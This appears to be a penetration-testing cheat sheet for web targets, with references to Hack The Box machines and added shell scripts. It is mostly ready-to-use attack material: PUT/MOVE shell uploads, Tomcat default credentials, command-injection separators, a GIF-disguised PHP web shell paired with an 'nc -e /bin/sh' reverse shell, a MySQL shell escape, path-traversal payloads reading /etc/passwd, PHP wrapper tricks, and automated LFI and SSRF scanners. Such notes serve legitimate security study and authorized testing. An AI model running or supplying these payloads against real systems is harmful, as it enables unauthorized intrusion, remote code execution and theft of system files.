Checking HTTP Methods
curl -i -X OPTIONS http://XXXX
nmap --script http-methods --script-args http-methods.url-path='/test' $ip

Curl usage (POST form data):
curl -X POST http://internal-01.bart.htb/simple_chat/register.php -d "uname=0xdf&passwd=password"
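Added example (not part of the original notes): a small wrapper around the OPTIONS check above that pulls the Allow header out of the response, flags the methods worth following up (PUT, DELETE, MOVE, the WebDAV set, TRACE), and then confirms PUT by actually uploading a harmless file, because an Allow header is only what the server claims. Target URLs are placeholders; the only dependency is curl.

```shell
#!/usr/bin/env sh
# Added example, not from the original cheat sheet. Parses OPTIONS responses
# and verifies PUT for real. URLs passed in are whatever you are testing.

RISKY_METHODS="PUT DELETE MOVE COPY PROPFIND PROPPATCH MKCOL LOCK UNLOCK TRACE CONNECT"

# Reads raw HTTP response headers on stdin and prints the risky methods the
# server advertises, space separated on one line. Returns 1 if there is no
# Allow header at all (some servers only answer OPTIONS on a real path).
dangerous_methods() {
    allow=$(tr -d '\r' | grep -i '^allow:' | head -n 1 | cut -d: -f2-)
    [ -n "$allow" ] || return 1
    found=""
    # Allow is comma separated, sometimes with spaces and mixed case.
    for m in $(printf '%s' "$allow" | tr ',' ' ' | tr '[:lower:]' '[:upper:]'); do
        for r in $RISKY_METHODS; do
            [ "$m" = "$r" ] && found="$found $m"
        done
    done
    printf '%s\n' "${found# }"
}

# OPTIONS one URL and report. Try both / and a deeper path (e.g. /test/),
# as the nmap script does with http-methods.url-path.
check_methods() {
    url=$1
    hdrs=$(curl -s -i -X OPTIONS "$url" 2>/dev/null)
    risky=$(printf '%s\n' "$hdrs" | dangerous_methods) || { echo "$url: no Allow header"; return 2; }
    if [ -n "$risky" ]; then
        echo "$url: risky methods advertised: $risky"
    else
        echo "$url: nothing interesting in Allow"
    fi
}

# Allow headers lie in both directions: confirm PUT by uploading a text file.
# 200/201/204 means the file landed; check it afterwards with a GET.
verify_put() {
    url=$1
    code=$(printf 'put-test\n' | curl -s -o /dev/null -w '%{http_code}' -T - "$url/put_test.txt")
    case $code in
        200|201|204) echo "PUT accepted ($code): $url/put_test.txt" ;;
        *)           echo "PUT rejected ($code)" ;;
    esac
}

# Usage: check_methods http://target/ ; check_methods http://target/test/ ; verify_put http://target
```

Run check_methods against the root and at least one real directory; a PUT that is refused at / is often accepted under an uploads or test path.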
Shell via Put Method
Put Shell
Upload the file with PUT, then (IIS/WebDAV) rename it to an executable extension with MOVE:
curl -X PUT -T "/path/to/file" "http://myputserver.com/puturl.tmp"
curl -X MOVE --header "Destination:http://ip/asp.asp" "http://ip/asp.txt"
RFI
fimap -u "http://$ip/example.php?test="
https://github.com/lightos/Panoptic/ (automates retrieval of common log and config files through path traversal)
JBOSS
JMX Console: http://$ip:8080/jmx-console/
Tomcat Manager Default Credentials
Tomcat manager (/manager/html), try default credentials: tomcat/tomcat, admin/manager, admin/password, admin/s3cret, tomcat/s3cret, admin (empty password).
Command Injection
Separators to append to the expected input (one probe per line):
`id`
| id
&& id
error || id
%0a id
File upload bypass
Set the Content-Type header to image/gif and prefix the file with the GIF magic bytes so naive checks accept it:
Content-Type: image/gif
GIF89a <?php echo system($_REQUEST['ippsec']); ?>
Then call the uploaded file: ?ippsec=nc -e /bin/sh ip port
SQL Shell
From an interactive mysql client, \! runs a shell command:
mysql -u root -p
\! /bin/sh
LFI
Linux
../../../../../../../../../../etc/passwd
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
../../../../../../../../../../etc/passwd%00
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%2500
Windows
../../../../../../../../../../boot.ini
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini
../../../../../../../../../../boot.ini%00
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%2500
(%00 null-byte truncation only works on PHP < 5.3.4; %2500 is the double-encoded form for when the app decodes twice.)
Wordlists
/usr/share/wordlists/SecLists/Fuzzing/JHADDIX_LFI.txt
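Added example (not from the original notes): a generator for the traversal variants above at increasing depth (plain, URL-encoded, null-byte and double-encoded null-byte), plus a loop that fires any payload list, generated or from the JHADDIX wordlist, at a URL template and reports responses containing a marker such as `root:x:0:0`. The `FUZZ` placeholder, the target URL and the marker are assumptions for the example.

```shell
#!/usr/bin/env sh
# Added example, not from the original cheat sheet. lfi_payloads needs only
# the shell; lfi_fuzz needs curl and a target you are allowed to test.

# Prints one payload per line for a target file, depth 1..max (default 10).
# Four variants per depth: ../ , ..%2f , ../ with %00 , ..%2f with %2500.
lfi_payloads() {
    target=${1#/}             # /etc/passwd -> etc/passwd ; boot.ini unchanged
    max=${2:-10}
    enc_target=$(printf '%s' "$target" | sed 's#/#%2f#g')
    d=1
    while [ "$d" -le "$max" ]; do
        plain=""; enc=""; i=0
        while [ "$i" -lt "$d" ]; do
            plain="${plain}../"; enc="${enc}..%2f"; i=$((i + 1))
        done
        printf '%s\n' "${plain}${target}" \
                      "${enc}${enc_target}" \
                      "${plain}${target}%00" \
                      "${enc}${enc_target}%2500"
        d=$((d + 1))
    done
}

# Reads payloads on stdin, substitutes each for FUZZ in the template, and
# prints the URLs whose response body contains the marker.
#   lfi_payloads /etc/passwd | lfi_fuzz 'http://$ip/page.php?file=FUZZ' 'root:x:0:0'
#   lfi_fuzz 'http://$ip/page.php?file=FUZZ' 'root:x:0:0' < JHADDIX_LFI.txt
lfi_fuzz() {
    template=$1; marker=$2
    while IFS= read -r p; do
        url=$(printf '%s' "$template" | sed "s#FUZZ#$p#")
        if curl -s "$url" | grep -q "$marker"; then
            echo "HIT: $url"
        fi
    done
}
```

Pick a marker that cannot appear on the normal page (for boot.ini, `[boot loader]`); matching on HTTP status alone misses the common case where the include fails quietly and the page still returns 200.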
LFI Wrappers
expect:// (runs a command; needs the expect extension, rarely installed)
http://x.x.x.x/blah?parameter=expect://whoami
data:// (needs allow_url_include=On)
http://x.x.x.x/blah?parameter=data://text/plain;base64,PD8gcGhwaW5mbygpOyA/Pg==
# the base64 encoded payload is: <? phpinfo(); ?>
php://input (needs allow_url_include=On; the PHP goes in the POST body, e.g. via Hackbar)
http://x.x.x.x/blah?parameter=php://input
# POST data: <? phpinfo(); ?>
LFI to RCE
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20inclusion#wrapper-data
SSRF
Port scan localhost through the SSRF parameter; open ports return a different body than closed ones:
for i in $(seq 1 60000); do echo $i; curl -X GET "http://ip:60000/url.php?path=http://localhost:$i/" 2> /dev/null | tr -d '\n'; done
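Added example (not from the original notes): the same scan with a baseline, so only ports whose response differs from a known-closed port are printed instead of 60000 lines to eyeball. `ssrf_fetch` is the only function that touches the network; the URL, parameter name (`path`) and the choice of port 1 as the closed baseline are assumptions, so redefine `ssrf_fetch` for a different vulnerable endpoint.

```shell
#!/usr/bin/env sh
# Added example, not from the original cheat sheet. Needs curl; the target
# URL below is the placeholder from the notes.

SSRF_URL=${SSRF_URL:-http://ip:60000/url.php}

# Fetch one internal port through the SSRF and return the body on one line.
# --max-time matters: filtered ports can hang the server-side request.
ssrf_fetch() {
    port=$1
    curl -s -G "$SSRF_URL" --data-urlencode "path=http://127.0.0.1:$port/" \
         --max-time 5 2>/dev/null | tr -d '\n'
}

# Scan the given ports and print those whose body differs from the baseline
# taken from port 1 (assumed closed). Prints port, body length and the first
# 40 bytes, which is usually enough to identify the service.
ssrf_scan() {
    baseline=$(ssrf_fetch 1)
    for port in "$@"; do
        body=$(ssrf_fetch "$port")
        if [ "$body" != "$baseline" ]; then
            printf '%s open? len=%s first=%s\n' "$port" "${#body}" \
                   "$(printf '%s' "$body" | cut -c1-40)"
        fi
    done
}

# Usage:
#   ssrf_scan 22 80 443 3306 5432 6379 8080 8443 9200
#   ssrf_scan $(seq 1 65535)
```

If every port looks open, the application is swallowing errors and returning the same page; switch to timing (add `-w '%{time_total}'` to the fetch) since a closed port fails fast and a filtered or open-but-silent one does not.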